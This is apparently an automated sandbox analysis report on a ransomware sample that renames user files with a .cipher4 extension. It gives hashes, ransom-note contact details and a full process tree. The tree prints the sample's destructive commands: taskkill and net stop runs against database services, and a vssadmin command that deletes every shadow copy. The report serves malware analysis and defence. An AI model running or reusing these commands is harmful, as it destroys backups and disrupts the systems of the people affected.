Analysis
max time kernel: 135s
max time network: 45s
platform: windows7_x64
resource: win7-20220812-en
resource tags: arch:x64 arch:x86 image:win7-20220812-en locale:en-us os:windows7-x64 system
submitted: 29-11-2022 11:01
Static task: static1
Behavioral task: behavioral1
  Sample: 64new_cip4.exe
  Resource: win7-20220812-en
Behavioral task: behavioral2
  Sample: 64new_cip4.exe
  Resource: win10v2004-20221111-en
General
Target: 64new_cip4.exe
Size: 309KB
MD5: 0b69c52d88d2c047bf176d59b2f9ce4c
SHA1: 43a770e0f2fe02b606f37c29d8dd81d57ce233b8
SHA256: 4e388c10feaa2c897a5c7816eb899b314b4a5cd4342d9a1a5f1800623153e890
SHA512: 7514371f10bbaf9e7db698347741ae66770d4ed1a2ad43fbb8f86d0ee13e54d652fd16b7410462e040cbeda19a7224af4431207dc0a197102ba00553639c4f72
SSDEEP: 6144:vPLavV9JccWJzcwYuUxhCKrSjZ5pjedRYc4ihyYr+3l0I3WtCyaw7c:v+vV9CZMuUxhC6SjZfjeu++3oaw7c
Malware Config
Extracted
\??\A:\!-Recovery_Instructions-!.html
Mikesupp77@outlook.com
https://tox.chat/download.html
Signatures
- Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  Processes:
    description            pid   process         target process
    PID 1044 created 1212  1044  64new_cip4.exe  Explorer.EXE
- Deletes shadow copies 2 TTPs
  Ransomware often targets backup files to inhibit system recovery.
- Modifies extensions of user files 3 IoCs
  Ransomware generally changes the extension on encrypted files.
  Processes:
    description   ioc                                                                                                  process
    File renamed  C:\Users\Admin\Pictures\ConvertFromDismount.png => C:\Users\Admin\Pictures\ConvertFromDismount.png.cipher4  64new_cip4.exe
    File renamed  C:\Users\Admin\Pictures\InvokeImport.tif => C:\Users\Admin\Pictures\InvokeImport.tif.cipher4              64new_cip4.exe
    File renamed  C:\Users\Admin\Pictures\LimitCompress.tif => C:\Users\Admin\Pictures\LimitCompress.tif.cipher4            64new_cip4.exe
- Enumerates connected drives 3 TTPs 24 IoCs
  Attempts to read the root path of hard drives other than the default C: drive.
  Processes:
    description              ioc (in the order logged)                                                                                                                                   process
    File opened (read-only)  \??\I:, \??\J:, \??\L:, \??\M:, \??\S:, \??\T:, \??\F:, \??\G:, \??\V:, \??\X:, \??\K:, \??\R:, \??\U:, \??\Z:, \??\A:, \??\E:, \??\H:, \??\P:, \??\O:, \??\Q:, \??\W:, \??\Y:, \??\B:, \??\N:  64new_cip4.exe
- Enumerates physical storage devices 1 TTPs
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
- Program crash 1 IoCs
  Processes:
    pid   pid_target  process       target process
    2020  1212        WerFault.exe  Explorer.EXE
- Interacts with shadow copies 2 TTPs 1 IoCs
  Shadow copies are often targeted by ransomware to inhibit system recovery.
  Processes:
    pid   process
    1716  vssadmin.exe
- Kills process with taskkill 16 IoCs
  Processes:
    process       pids
    taskkill.exe  2008, 1052, 1796, 276, 1984, 1832, 2036, 1412, 1772, 572, 1036, 1308, 1888, 1752, 1480, 848
- Runs net.exe
- Suspicious behavior: EnumeratesProcesses 60 IoCs
  Processes:
    pid   process
    1044  64new_cip4.exe  (60 identical entries)
- Suspicious use of AdjustPrivilegeToken 19 IoCs
  Processes:
    description                 pid   process
    Token: SeDebugPrivilege     taskkill.exe pids 2008, 1752, 572, 1480, 276, 1984, 1832, 2036, 848, 1036, 1412, 1308, 1772, 1796, 1888, 1052 (16 entries)
    Token: SeBackupPrivilege    320   vssvc.exe
    Token: SeRestorePrivilege   320   vssvc.exe
    Token: SeAuditPrivilege     320   vssvc.exe
- Suspicious use of WriteProcessMemory 64 IoCs
  Processes:
    description                       pid   process         target process  entries
    PID 1044 wrote to memory of 1304  1044  64new_cip4.exe  cmd.exe         4
    PID 1304 wrote to memory of 2040  1304  cmd.exe         cmd.exe         4
    PID 1044 wrote to memory of 1096  1044  64new_cip4.exe  cmd.exe         4
    PID 1096 wrote to memory of 1052  1096  cmd.exe         cmd.exe         4
    PID 1052 wrote to memory of 2008  1052  cmd.exe         taskkill.exe    3
    PID 1044 wrote to memory of 2016  1044  64new_cip4.exe  cmd.exe         4
    PID 2016 wrote to memory of 1104  2016  cmd.exe         cmd.exe         4
    PID 1104 wrote to memory of 1752  1104  cmd.exe         taskkill.exe    3
    PID 1044 wrote to memory of 1952  1044  64new_cip4.exe  cmd.exe         4
    PID 1952 wrote to memory of 1092  1952  cmd.exe         cmd.exe         4
    PID 1092 wrote to memory of 572   1092  cmd.exe         taskkill.exe    3
    PID 1044 wrote to memory of 1992  1044  64new_cip4.exe  cmd.exe         4
    PID 1992 wrote to memory of 1140  1992  cmd.exe         cmd.exe         4
    PID 1140 wrote to memory of 1480  1140  cmd.exe         taskkill.exe    3
    PID 1044 wrote to memory of 1148  1044  64new_cip4.exe  cmd.exe         4
    PID 1148 wrote to memory of 772   1148  cmd.exe         cmd.exe         4
    PID 772 wrote to memory of 276    772   cmd.exe         taskkill.exe    3
    PID 1044 wrote to memory of 1968  1044  64new_cip4.exe  cmd.exe         1
- System policy modification 1 TTPs 4 IoCs
  Processes:
    description      ioc                                                                                                     process         entries
    Set value (int)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1"  64new_cip4.exe  2
    Key created      \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System                               64new_cip4.exe  2
Processes
- [depth 1] C:\Windows\Explorer.EXE
  command line: C:\Windows\Explorer.EXE
  - [depth 2] C:\Users\Admin\AppData\Local\Temp\64new_cip4.exe
    command line: "C:\Users\Admin\AppData\Local\Temp\64new_cip4.exe"
    - Suspicious use of NtCreateUserProcessOtherParentProcess
    - Modifies extensions of user files
    - Enumerates connected drives
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
    - System policy modification
    - [depth 3] C:\Windows\SysWOW64\cmd.exe
      command line: C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c rem Kill "SQL"
      - Suspicious use of WriteProcessMemory
      - [depth 4] C:\Windows\system32\cmd.exe
        command line: C:\Windows\sysnative\cmd.exe /c rem Kill "SQL"
    - [depth 3] C:\Windows\SysWOW64\cmd.exe
      command line: C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im sqlbrowser.exe
      - Suspicious use of WriteProcessMemory
      - [depth 4] C:\Windows\system32\cmd.exe
        command line: C:\Windows\sysnative\cmd.exe /c taskkill -f -im sqlbrowser.exe
        - Suspicious use of WriteProcessMemory
        - [depth 5] C:\Windows\system32\taskkill.exe
          command line: taskkill -f -im sqlbrowser.exe
          - Kills process with taskkill
          - Suspicious use of AdjustPrivilegeToken
    - [depth 3] C:\Windows\SysWOW64\cmd.exe
      command line: C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im sqlwriter.exe
      - Suspicious use of WriteProcessMemory
      - [depth 4] C:\Windows\system32\cmd.exe
        command line: C:\Windows\sysnative\cmd.exe /c taskkill -f -im sqlwriter.exe
        - Suspicious use of WriteProcessMemory
        - [depth 5] C:\Windows\system32\taskkill.exe
          command line: taskkill -f -im sqlwriter.exe
          - Kills process with taskkill
          - Suspicious use of AdjustPrivilegeToken
    - [depth 3] C:\Windows\SysWOW64\cmd.exe
      command line: C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im sqlservr.exe
      - Suspicious use of WriteProcessMemory
      - [depth 4] C:\Windows\system32\cmd.exe
        command line: C:\Windows\sysnative\cmd.exe /c taskkill -f -im sqlservr.exe
        - Suspicious use of WriteProcessMemory
        - [depth 5] C:\Windows\system32\taskkill.exe
          command line: taskkill -f -im sqlservr.exe
          - Kills process with taskkill
          - Suspicious use of AdjustPrivilegeToken
    - [depth 3] C:\Windows\SysWOW64\cmd.exe
      command line: C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im msmdsrv.exe
      - Suspicious use of WriteProcessMemory
      - [depth 4] C:\Windows\system32\cmd.exe
        command line: C:\Windows\sysnative\cmd.exe /c taskkill -f -im msmdsrv.exe
        - Suspicious use of WriteProcessMemory
        - [depth 5] C:\Windows\system32\taskkill.exe
          command line: taskkill -f -im msmdsrv.exe
          - Kills process with taskkill
          - Suspicious use of AdjustPrivilegeToken
    - [depth 3] C:\Windows\SysWOW64\cmd.exe
      command line: C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im MsDtsSrvr.exe
      - Suspicious use of WriteProcessMemory
      - [depth 4] C:\Windows\system32\cmd.exe
        command line: C:\Windows\sysnative\cmd.exe /c taskkill -f -im MsDtsSrvr.exe
        - Suspicious use of WriteProcessMemory
        - [depth 5] C:\Windows\system32\taskkill.exe
          command line: taskkill -f -im MsDtsSrvr.exe
          - Kills process with taskkill
          - Suspicious use of AdjustPrivilegeToken
    - [depth 3] C:\Windows\SysWOW64\cmd.exe
      command line: C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im sqlceip.exe
      - [depth 4] C:\Windows\system32\cmd.exe
        command line: C:\Windows\sysnative\cmd.exe /c taskkill -f -im sqlceip.exe
        - [depth 5] C:\Windows\system32\taskkill.exe
          command line: taskkill -f -im sqlceip.exe
          - Kills process with taskkill
          - Suspicious use of AdjustPrivilegeToken
    - [depth 3] C:\Windows\SysWOW64\cmd.exe
      command line: C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im fdlauncher.exe
      - [depth 4] C:\Windows\system32\cmd.exe
        command line: C:\Windows\sysnative\cmd.exe /c taskkill -f -im fdlauncher.exe
        - [depth 5] C:\Windows\system32\taskkill.exe
          command line: taskkill -f -im fdlauncher.exe
          - Kills process with taskkill
          - Suspicious use of AdjustPrivilegeToken
    - [depth 3] C:\Windows\SysWOW64\cmd.exe
      command line: C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im Ssms.exe
      - [depth 4] C:\Windows\system32\cmd.exe
        command line: C:\Windows\sysnative\cmd.exe /c taskkill -f -im Ssms.exe
        - [depth 5] C:\Windows\system32\taskkill.exe
          command line: taskkill -f -im Ssms.exe
          - Kills process with taskkill
          - Suspicious use of AdjustPrivilegeToken
    - [depth 3] C:\Windows\SysWOW64\cmd.exe
      command line: C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im SQLAGENT.EXE
      - [depth 4] C:\Windows\system32\cmd.exe
        command line: C:\Windows\sysnative\cmd.exe /c taskkill -f -im SQLAGENT.EXE
    - [depth 3] C:\Windows\SysWOW64\cmd.exe
      command line: C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im fdhost.exe
      - [depth 4] C:\Windows\system32\cmd.exe
        command line: C:\Windows\sysnative\cmd.exe /c taskkill -f -im fdhost.exe
        - [depth 5] C:\Windows\system32\taskkill.exe
          command line: taskkill -f -im fdhost.exe
          - Kills process with taskkill
          - Suspicious use of AdjustPrivilegeToken
    - [depth 3] C:\Windows\SysWOW64\cmd.exe
      command line: C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im fdlauncher.exe
      - [depth 4] C:\Windows\system32\cmd.exe
        command line: C:\Windows\sysnative\cmd.exe /c taskkill -f -im fdlauncher.exe
        - [depth 5] C:\Windows\system32\taskkill.exe
          command line: taskkill -f -im fdlauncher.exe
          - Kills process with taskkill
          - Suspicious use of AdjustPrivilegeToken
    - [depth 3] C:\Windows\SysWOW64\cmd.exe
      command line: C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im sqlservr.exe
      - [depth 4] C:\Windows\system32\cmd.exe
        command line: C:\Windows\sysnative\cmd.exe /c taskkill -f -im sqlservr.exe
        - [depth 5] C:\Windows\system32\taskkill.exe
          command line: taskkill -f -im sqlservr.exe
          - Kills process with taskkill
          - Suspicious use of AdjustPrivilegeToken
    - [depth 3] C:\Windows\SysWOW64\cmd.exe
      command line: C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im ReportingServicesService.exe
      - [depth 4] C:\Windows\system32\cmd.exe
        command line: C:\Windows\sysnative\cmd.exe /c taskkill -f -im ReportingServicesService.exe
        - [depth 5] C:\Windows\system32\taskkill.exe
          command line: taskkill -f -im ReportingServicesService.exe
          - Kills process with taskkill
          - Suspicious use of AdjustPrivilegeToken
    - [depth 3] C:\Windows\SysWOW64\cmd.exe
      command line: C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im msftesql.exe
      - [depth 4] C:\Windows\system32\cmd.exe
        command line: C:\Windows\sysnative\cmd.exe /c taskkill -f -im msftesql.exe
    - [depth 3] C:\Windows\SysWOW64\cmd.exe
      command line: C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im pg_ctl.exe
      - [depth 4] C:\Windows\system32\cmd.exe
        command line: C:\Windows\sysnative\cmd.exe /c taskkill -f -im pg_ctl.exe
    - [depth 3] C:\Windows\SysWOW64\cmd.exe
      command line: C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im postgres.exe
      - [depth 4] C:\Windows\system32\cmd.exe
        command line: C:\Windows\sysnative\cmd.exe /c taskkill -f -im postgres.exe
        - [depth 5] C:\Windows\system32\taskkill.exe
          command line: taskkill -f -im postgres.exe
          - Kills process with taskkill
          - Suspicious use of AdjustPrivilegeToken
    - [depth 3] C:\Windows\SysWOW64\cmd.exe
      command line: C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop MSSQLServerADHelper100
      - [depth 4] C:\Windows\system32\cmd.exe
        command line: C:\Windows\sysnative\cmd.exe /c net stop MSSQLServerADHelper100
        - [depth 5] C:\Windows\system32\net.exe
          command line: net stop MSSQLServerADHelper100
          - [depth 6] C:\Windows\system32\net1.exe
            command line: C:\Windows\system32\net1 stop MSSQLServerADHelper100
    - [depth 3] C:\Windows\SysWOW64\cmd.exe
      command line: C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop MSSQL$ISARS
      - [depth 4] C:\Windows\system32\cmd.exe
        command line: C:\Windows\sysnative\cmd.exe /c net stop MSSQL$ISARS
        - [depth 5] C:\Windows\system32\net.exe
          command line: net stop MSSQL$ISARS
          - [depth 6] C:\Windows\system32\net1.exe
            command line: C:\Windows\system32\net1 stop MSSQL$ISARS
    - [depth 3] C:\Windows\SysWOW64\cmd.exe
      command line: C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop MSSQL$MSFW
      - [depth 4] C:\Windows\system32\cmd.exe
        command line: C:\Windows\sysnative\cmd.exe /c net stop MSSQL$MSFW
        - [depth 5] C:\Windows\system32\net.exe
          command line: net stop MSSQL$MSFW
          - [depth 6] C:\Windows\system32\net1.exe
            command line: C:\Windows\system32\net1 stop MSSQL$MSFW
    - [depth 3] C:\Windows\SysWOW64\cmd.exe
      command line: C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop SQLAgent$ISARS
      - [depth 4] C:\Windows\system32\cmd.exe
        command line: C:\Windows\sysnative\cmd.exe /c net stop SQLAgent$ISARS
        - [depth 5] C:\Windows\system32\net.exe
          command line: net stop SQLAgent$ISARS
          - [depth 6] C:\Windows\system32\net1.exe
            command line: C:\Windows\system32\net1 stop SQLAgent$ISARS
    - [depth 3] C:\Windows\SysWOW64\cmd.exe
      command line: C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop SQLAgent$MSFW
      - [depth 4] C:\Windows\system32\cmd.exe
        command line: C:\Windows\sysnative\cmd.exe /c net stop SQLAgent$MSFW
        - [depth 5] C:\Windows\system32\net.exe
          command line: net stop SQLAgent$MSFW
          - [depth 6] C:\Windows\system32\net1.exe
            command line: C:\Windows\system32\net1 stop SQLAgent$MSFW
    - [depth 3] C:\Windows\SysWOW64\cmd.exe
      command line: C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop SQLBrowser
      - [depth 4] C:\Windows\system32\cmd.exe
        command line: C:\Windows\sysnative\cmd.exe /c net stop SQLBrowser
        - [depth 5] C:\Windows\system32\net.exe
          command line: net stop SQLBrowser
          - [depth 6] C:\Windows\system32\net1.exe
            command line: C:\Windows\system32\net1 stop SQLBrowser
    - [depth 3] C:\Windows\SysWOW64\cmd.exe
      command line: C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop ReportServer$ISARS
      - [depth 4] C:\Windows\system32\cmd.exe
        command line: C:\Windows\sysnative\cmd.exe /c net stop ReportServer$ISARS
        - [depth 5] C:\Windows\system32\net.exe
          command line: net stop ReportServer$ISARS
          - [depth 6] C:\Windows\system32\net1.exe
            command line: C:\Windows\system32\net1 stop ReportServer$ISARS
    - [depth 3] C:\Windows\SysWOW64\cmd.exe
      command line: C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop SQLWriter
      - [depth 4] C:\Windows\system32\cmd.exe
        command line: C:\Windows\sysnative\cmd.exe /c net stop SQLWriter
        - [depth 5] C:\Windows\system32\net.exe
          command line: net stop SQLWriter
          - [depth 6] C:\Windows\system32\net1.exe
            command line: C:\Windows\system32\net1 stop SQLWriter
    - [depth 3] C:\Windows\SysWOW64\cmd.exe
      command line: C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c vssadmin.exe Delete Shadows /All /Quiet
      - [depth 4] C:\Windows\system32\cmd.exe
        command line: C:\Windows\sysnative\cmd.exe /c vssadmin.exe Delete Shadows /All /Quiet
        - [depth 5] C:\Windows\system32\vssadmin.exe
          command line: vssadmin.exe Delete Shadows /All /Quiet
          - Interacts with shadow copies
  - [depth 2] C:\Users\Admin\AppData\Local\Temp\64new_cip4.exe
    command line: \\?\C:\Users\Admin\AppData\Local\Temp\64new_cip4.exe -network
    - System policy modification
    - [depth 3] C:\Windows\SysWOW64\cmd.exe
      command line: C:\Windows\system32\cmd.exe /c pause
  - [depth 2] C:\Windows\system32\WerFault.exe
    command line: C:\Windows\system32\WerFault.exe -u -p 1212 -s 3080
    - Program crash
- [depth 1] C:\Windows\system32\taskkill.exe
  command line: taskkill -f -im SQLAGENT.EXE
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
- [depth 1] C:\Windows\system32\taskkill.exe
  command line: taskkill -f -im msftesql.exe
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
- [depth 1] C:\Windows\system32\taskkill.exe
  command line: taskkill -f -im pg_ctl.exe
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
- [depth 1] C:\Windows\system32\vssvc.exe
  command line: C:\Windows\system32\vssvc.exe
  - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6